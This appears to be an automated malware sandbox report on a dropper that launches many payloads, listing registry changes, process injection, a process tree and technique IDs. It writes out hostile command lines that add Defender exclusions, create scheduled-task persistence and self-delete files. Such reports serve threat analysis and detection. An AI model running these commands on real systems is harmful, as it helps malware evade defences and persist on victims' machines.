Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\NumMethods	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ProgID\ = "GoogleUpdate.OnDemandCOMClassMachineFallback.1.0"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\VersionIndependentProgID\ = "GoogleUpdate.Update3COMClassService"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods\ = "41"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher.1.0\ = "Google Update Process Launcher Class"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\goopdate.dll,-1004"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2732F2FE-BCF7-4CE1-8ABD-951329519827}\InprocHandler32\ThreadingModel = "Both"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ = "IPolicyStatus"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\ = "GoogleUpdate CredentialDialog"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusSvc.1.0\CLSID\ = "{1C4CDEFF-756A-4804-9E77-3E8EB9361016}"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods\ = "12"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\GoogleUpdateBroker.exe\""	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3COMClassService\CurVer\ = "GoogleUpdate.Update3COMClassService.1.0"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\ProxyStubClsid32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ = "IGoogleUpdateCore"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents"	GoogleUpdateComRegisterShell64.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1860	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3216	powershell.exe
3216	powershell.exe
4912	GoogleUpdate.exe
4912	GoogleUpdate.exe
4912	GoogleUpdate.exe
4912	GoogleUpdate.exe
4912	GoogleUpdate.exe
4912	GoogleUpdate.exe
3216	powershell.exe
2704	DisableUAC.exe
2704	DisableUAC.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1156	smss.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	a.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	4912	GoogleUpdate.exe
Token: SeDebugPrivilege	4912	GoogleUpdate.exe
Token: SeDebugPrivilege	4912	GoogleUpdate.exe
Token: SeDebugPrivilege	3464	IE_NET.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4448	ewrue.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2900 wrote to memory of 3420	2900	a.exe	67
PID 2900 wrote to memory of 3420	2900	a.exe	67
PID 2900 wrote to memory of 3420	2900	a.exe	67
PID 2900 wrote to memory of 340	2900	a.exe	69
PID 2900 wrote to memory of 340	2900	a.exe	69
PID 2900 wrote to memory of 4732	2900	a.exe	70
PID 2900 wrote to memory of 4732	2900	a.exe	70
PID 2900 wrote to memory of 4732	2900	a.exe	70
PID 2900 wrote to memory of 1156	2900	a.exe	71
PID 2900 wrote to memory of 1156	2900	a.exe	71
PID 2900 wrote to memory of 1156	2900	a.exe	71
PID 340 wrote to memory of 2192	340	ogumbgejapxd.exe	72
PID 340 wrote to memory of 2192	340	ogumbgejapxd.exe	72
PID 2192 wrote to memory of 4708	2192	cmd.exe	74
PID 2192 wrote to memory of 4708	2192	cmd.exe	74
PID 3420 wrote to memory of 4728	3420	tg.exe	75
PID 3420 wrote to memory of 4728	3420	tg.exe	75
PID 3420 wrote to memory of 4728	3420	tg.exe	75
PID 3420 wrote to memory of 4728	3420	tg.exe	75
PID 3420 wrote to memory of 4728	3420	tg.exe	75
PID 1156 wrote to memory of 2068	1156	smss.exe	78
PID 1156 wrote to memory of 2068	1156	smss.exe	78
PID 1156 wrote to memory of 2068	1156	smss.exe	78
PID 1156 wrote to memory of 2068	1156	smss.exe	78
PID 2900 wrote to memory of 1012	2900	a.exe	79
PID 2900 wrote to memory of 1012	2900	a.exe	79
PID 1012 wrote to memory of 3216	1012	1.exe	80
PID 1012 wrote to memory of 3216	1012	1.exe	80
PID 2900 wrote to memory of 4780	2900	a.exe	82
PID 2900 wrote to memory of 4780	2900	a.exe	82
PID 2900 wrote to memory of 4780	2900	a.exe	82
PID 2900 wrote to memory of 4440	2900	a.exe	83
PID 2900 wrote to memory of 4440	2900	a.exe	83
PID 2900 wrote to memory of 4440	2900	a.exe	83
PID 4440 wrote to memory of 4912	4440	v.exe	84
PID 4440 wrote to memory of 4912	4440	v.exe	84
PID 4440 wrote to memory of 4912	4440	v.exe	84
PID 2900 wrote to memory of 3464	2900	a.exe	85
PID 2900 wrote to memory of 3464	2900	a.exe	85
PID 2900 wrote to memory of 3464	2900	a.exe	85
PID 2900 wrote to memory of 2704	2900	a.exe	187
PID 2900 wrote to memory of 2704	2900	a.exe	187
PID 2900 wrote to memory of 2704	2900	a.exe	187
PID 4912 wrote to memory of 2804	4912	GoogleUpdate.exe	86
PID 4912 wrote to memory of 2804	4912	GoogleUpdate.exe	86
PID 4912 wrote to memory of 2804	4912	GoogleUpdate.exe	86
PID 3216 wrote to memory of 1252	3216	powershell.exe	88
PID 3216 wrote to memory of 1252	3216	powershell.exe	88
PID 4912 wrote to memory of 4872	4912	GoogleUpdate.exe	90
PID 4912 wrote to memory of 4872	4912	GoogleUpdate.exe	90
PID 4912 wrote to memory of 4872	4912	GoogleUpdate.exe	90
PID 4872 wrote to memory of 2148	4872	GoogleUpdate.exe	129
PID 4872 wrote to memory of 2148	4872	GoogleUpdate.exe	129
PID 4872 wrote to memory of 724	4872	GoogleUpdate.exe	92
PID 4872 wrote to memory of 724	4872	GoogleUpdate.exe	92
PID 2900 wrote to memory of 4448	2900	a.exe	93
PID 2900 wrote to memory of 4448	2900	a.exe	93
PID 2900 wrote to memory of 4448	2900	a.exe	93
PID 4872 wrote to memory of 5064	4872	GoogleUpdate.exe	94
PID 4872 wrote to memory of 5064	4872	GoogleUpdate.exe	94
PID 4912 wrote to memory of 4944	4912	GoogleUpdate.exe	96
PID 4912 wrote to memory of 4944	4912	GoogleUpdate.exe	96
PID 4912 wrote to memory of 4944	4912	GoogleUpdate.exe	96
PID 2900 wrote to memory of 4320	2900	a.exe	223

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	IE_NET.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	IE_NET.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900
- C:\Users\Admin\AppData\Local\Temp\a\tg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3420
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 276
    3⤵
    - Program crash
    PID:3788
- C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\ogumbgejapxd.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2192
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:4708
- C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:4732
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    - Executes dropped EXE
    PID:2068
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 820
      4⤵
      Program crash
      PID:772
- C:\Users\Admin\AppData\Local\Temp\a\1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3216
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
      4⤵
      Creates scheduled task(s)
      PID:1252
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  - Executes dropped EXE
  PID:4780
- C:\Users\Admin\AppData\Local\Temp\a\v.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
    3⤵
    - Sets file execution options in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:2804
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4872
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:2148
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:724
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:5064
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NUZFQTk3NTUtOUNCMC00RUNBLUJGNUMtOUYzQUM1RUM2N0NGfSIgdXNlcmlkPSJ7N0U2QzE0QjMtRjg3Qi00OEU1LUE3NkItOTY0MzdBNjYwRTM4fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezU1NUJBRThDLTIyNTUtNDQwNy04OTg3LTgzNzI2RDA2MjlFOX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNDA0MCIvPjwvYXBwPjwvcmVxdWVzdD4
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4944
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{5FEA9755-9CB0-4ECA-BF5C-9F3AC5EC67CF}"
      4⤵
      PID:4220
- C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:3464
- C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
  2⤵
  PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:3592
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:4160
- C:\Users\Admin\AppData\Local\Temp\a\ewrue.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ewrue.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4448
- C:\Users\Admin\AppData\Local\Temp\a\wefrswer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wefrswer.exe"
  2⤵
  PID:4320
- C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe"
  2⤵
  PID:1028
- - C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IE_NET.exe"
    3⤵
    PID:5712
- C:\Users\Admin\AppData\Local\Temp\a\GIB.exe
  "C:\Users\Admin\AppData\Local\Temp\a\GIB.exe"
  2⤵
  PID:96
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "{path}"
    3⤵
    PID:5612
- C:\Users\Admin\AppData\Local\Temp\a\binn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\binn.exe"
  2⤵
  PID:2152
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5888
- C:\Users\Admin\AppData\Local\Temp\a\trust.exe
  "C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
  2⤵
  PID:5008
- C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe"
  2⤵
  PID:1940
- - C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe
    "{path}"
    3⤵
    PID:5788
- C:\Users\Admin\AppData\Local\Temp\a\ready.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ready.exe"
  2⤵
  PID:684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:4936
- C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
  2⤵
  PID:1604
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:5992
- C:\Users\Admin\AppData\Local\Temp\a\100.exe
  "C:\Users\Admin\AppData\Local\Temp\a\100.exe"
  2⤵
  PID:4524
- - C:\Users\Admin\AppData\Local\Temp\Start.exe
    "C:\Users\Admin\AppData\Local\Temp\Start.exe"
    3⤵
    PID:5020
- - C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    3⤵
    PID:5600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      PID:7164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:7156
- C:\Users\Admin\AppData\Local\Temp\a\fotocr06.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotocr06.exe"
  2⤵
  PID:4972
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y3994636.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y3994636.exe
    3⤵
    PID:3424
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y9256166.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\y9256166.exe
      4⤵
      PID:1592
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k4343129.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\k4343129.exe
        5⤵
        
        PID:2556
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
        6⤵
        
        PID:1548
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l8002894.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\l8002894.exe
        5⤵
        
        PID:4028
- C:\Users\Admin\AppData\Local\Temp\a\foto148.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto148.exe"
  2⤵
  PID:2040
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x7966945.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x7966945.exe
    3⤵
    PID:896
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x7176847.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x7176847.exe
      4⤵
      PID:4480
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f3582753.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f3582753.exe
        5⤵
        
        PID:3796
- C:\Users\Admin\AppData\Local\Temp\a\cc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cc.exe"
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 840
    3⤵
    - Program crash
    PID:5820
- C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe"
  2⤵
  PID:4704
- - C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe
    "{path}"
    3⤵
    PID:5428
- C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
  2⤵
  PID:4372
- C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
  2⤵
  PID:4328
- - C:\ProgramData\freebl3.dllmsvcp140.dll-0CX5H5.2.4.2\freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
    C:\ProgramData\freebl3.dllmsvcp140.dll-0CX5H5.2.4.2\freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:2148
- C:\Users\Admin\AppData\Local\Temp\a\alice.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alice.exe"
  2⤵
  PID:5060
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "alice" /tr "C:\Users\Admin\AppData\Roaming\alice.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4700
- C:\Users\Admin\AppData\Local\Temp\a\dwm.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dwm.exe"
  2⤵
  PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\dwm.exe" -Force
    3⤵
    PID:4720
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5168
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
    3⤵
    PID:5216
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:5200
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:5260
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:5316
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:5308
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5296
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
